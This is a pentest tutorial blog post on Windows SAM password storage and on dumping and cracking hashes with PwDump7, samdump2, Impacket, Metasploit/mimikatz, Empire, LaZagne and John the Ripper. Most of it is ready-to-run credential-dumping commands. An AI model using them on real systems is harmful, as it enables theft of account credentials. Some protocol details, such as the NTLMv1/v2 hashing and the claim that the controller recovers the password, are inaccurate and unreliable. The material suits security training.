In this article, were learn how passwords are stored in windows and out of the methods used to hash passwords in SAM, we will focus on LM and NTLM authentications. And then we learn how to dump these credential hashes from SAM.
Table of Content
- Introduction to SAM
- How passwords are stored?
- LM Authentication
- NTLM Authentication
- PwDump7
- SamDump2
- Impacket
- Metasploit Framework
- Kodiac
- PowerShell Empire
- Powershell
- LaZagne
- Decrypting hash: John The Ripper
Introduction to SAM
SAM is short for Security Account manager which manages all the user accounts and their passwords. It acts as a database. All the passwords are hashed and then stored SAM. It is the responsibility of LSA (Local Security Authority) to verify user login by matching the passwords with the database maintained in SAM. SAM starts running in the background as soon as the windows startup. SAM is found in C:\Windows\System32\config and passwords that are hashed and saved in SAM can finding registry, just go to the registry and navigate yourself to HKEY_LOCAL_MACHINE\SAM
How are Passwords stored in Windows?
To know how passwords are saved in windows, we will first need to understand what are LM, NTLM v1 & v2, Kerberos.
LM authentication
LAN Manager (LM) authentication was developed by IBM for Microsoft’s Windows Operating Systems. The security it provides is considered hackable today. It converts your password into a hash by breaking it in two chunks of seven characters. And then further encrypting each chunk. It is not case sensitive either, which is a huge drawback. As this method coverts the whole thing into uppercase, so when the attacker is applying any attack like brute force or dictionary; they can altogether avoid the possibility of lowercase. The key it is using to encrypt is 56-bit DES which now can be easily hacked.
NTLM authentication
NTLM authentication was developed to secure your systems as LM proved to be insecure in time. NTLM’s base is a challenge-response mechanism. It uses three components – nonce (challenge), response and authentication.
When any password is stored in windows, NTLM starts working by encrypting the password and the storing the hash of the said password while it disposes of the actual password. And it further sends the username to the server, then the server creates a 16-byte numeric string, which is random, namely nonce and sends it to the client. Now, the client will encrypt the nonce using the hash string of the password and send the result back to the server. This process is called a response. These three components (nonce, username and response) will be sent to Domain Controller. The Domain Controller will recover the password using hash from the Security Account Manager (SAM) database. Furthermore, the domain controller will check if the nonce and response in case they match, Authentication turns out to be successful.
Working of NTLM v1 and NTML v2 is same, although there are few differences such as NTML v1 is MD4 and v2 is MD5 and in v1 C/R Length is 56 bits + 56-bit +16 bit while v2 uses 128 bits. When it comes to C/R Algorithm v1 uses DES (ECB mode) and v2 is HMAC_MD5. and lastly, in v1 C/R Value Length 64 bit + 64 bit + 64 bit and v2 uses 128 bits.
Now as we have understood these hashing systems, let’s focus on how to dump them. The methods we will focus on are best suited for both internal and external pen-testing. Let’s begin!
PwDump7
This tool is developed by Tarasco and you can download it from here. This tool extracts the SAM file from the system and dumps its credentials. To execute this tool just run the following command in command prompt after downloading:
PwDump7.exe
And as a result, it will dump all the hashes stored in SAM file as shown in the image above.
Now, we will save the registry values of the SAM file and system file in a file in the system by using the following commands:
reg save hklm\sam c:\sam reg save hklm\system c:\system
We saved the values with the above command to retrieve the data from the SAM file.
SamDump2
Once you have retrieved the data from SAM, you can use SamDump2 tool to dump its hashes with the following command:
samdump2 system sam
Impacket
Impacket tool can also extract all the hashes for you from the SAM file with the following command:
./secretsdump.py -sam /root/Desktop/sam -system /root/Desktop/system LOCAL
Metasploit Framework: HashDump
When you have a meterpreter session of a target, just run hashdump command and it will dump all the hashes from SAM file of the target system. The same is shown in the image below:
Another way to dump hashes through hashdump module is through a post exploit that Metasploit offers. To use the said exploit, use the following set of commands:
use post/windows/gather/hashdump set session 1 exploit
Metasploit Framework: credential_collector
Another way to dump credentials by using Metasploit is via another in-built post exploit. To use this exploit, simply background your session and run the following command:
use post/windows/gather/credential/credential_collector set session 1 exploit
Metasploit Framework: load kiwi
The next method that Metasploit offers are by firing up the mimikatz module. To load mimikatz, use the load kiwi command and then use the following command to dump the whole SAM file using mimikatz.
lsa_dump_sam
Hence, you have your passwords as you can see in the image above.
Metasploit Framework: Invoke-Powerdump.ps1
Download Invoke-Powerdump Script
The method of Metasploit involves PowerShell. After getting the meterpreter session, access windows PowerShell by using the command load PowerShell. And then use the following set of commands to run the Invoke-PowerDump.ps1 script.
powershell_import /root/Invoke-PowerDump.ps1 powershell_execute Invoke-PowerDump.ps1
Once the above commands execute the script, you will have the dumped passwords just as in the image above.
Metasploit Framework: Get-PassHashes.ps1
Download Get-PassHashes Script
Again, via meterpreter, access the windows PowerShell using the command load PowerShell. And the just like in the previous method, use the following commands to execute the scripts to retrieve the passwords.
powershell_import GetHashes.ps1 powershell_execute Get-PassHashes.ps1
And VOILA! All the passwords have been retrieved.
Kodiac
Once you have the session by Kodiac C2, use the hashdump_sam module to get passwords as shown below:
use hashdump_sam execute
All the hashes from the SAM file will be dumped as shown in the above image.
Powershell Empire: mimikatz/sam
Once you have the session through the empire, interact with the session and use the mimikatz/sam module to dump the credentials with help of following commands:
usemodule credentials/mimikatz/sam execute
This exploit will run mimikatz and will get you all the passwords you desire by dumping SAM file.
Powershell Empire: credentials/powerdump
Empire offers us with yet another exploit that dumps the credentials from the victim’s system. This module does not invoke mimikatz like the previous method. To uses this exploit, type:
usemodule credentials.powerdump execute
Yes!! You will have the hashes.
PowerShell
Download Invoke-Powerdump Script
This method is an excellent one for local testing, AKA internal testing. To use this method, simply type the following in the Powershell:
Import-Module <'path of the powerdump script'> Invoke PowerDump
And, it will dump all the credentials for you.
LaZAgne
LaZage is an amazing tool for dumping all kinds of passwords. We have dedicatedly covered LaZagne in our previous article. To visit the said article, click here. Now, to dump SAM hashes with LaZagne, just use the following command:
lazagne.exe all
Yay!!! All the credentials have been dumped.
Decrypting Hash: John The Ripper
John The Ripper is an amazing hash cracking tool. We have dedicated two articles on this tool. To learn more about John The Ripper, click here – part 1, part 2. Once you have dumped all the hashes from SAM file by using any of method given above, then you just need John The Ripper tool to crack the hashes by using the following command:
john –format=NT hash –show
And as you can see, it will reveal the password by cracking the given hash.
The article focuses on dumping credentials from windows SAM file. Various methods have been shown using multiple platforms to successfully dump the credentials. To secure yourself you first must learn how a vulnerability can be exploited and to what extent. Therefore, such knowing such methods and what they can do is important.
Author: Yashika Dhir is a passionate Researcher and Technical Writer at Hacking Articles. She is a hacking enthusiast. contact here
The post Credential Dumping: SAM appeared first on Hacking Articles.
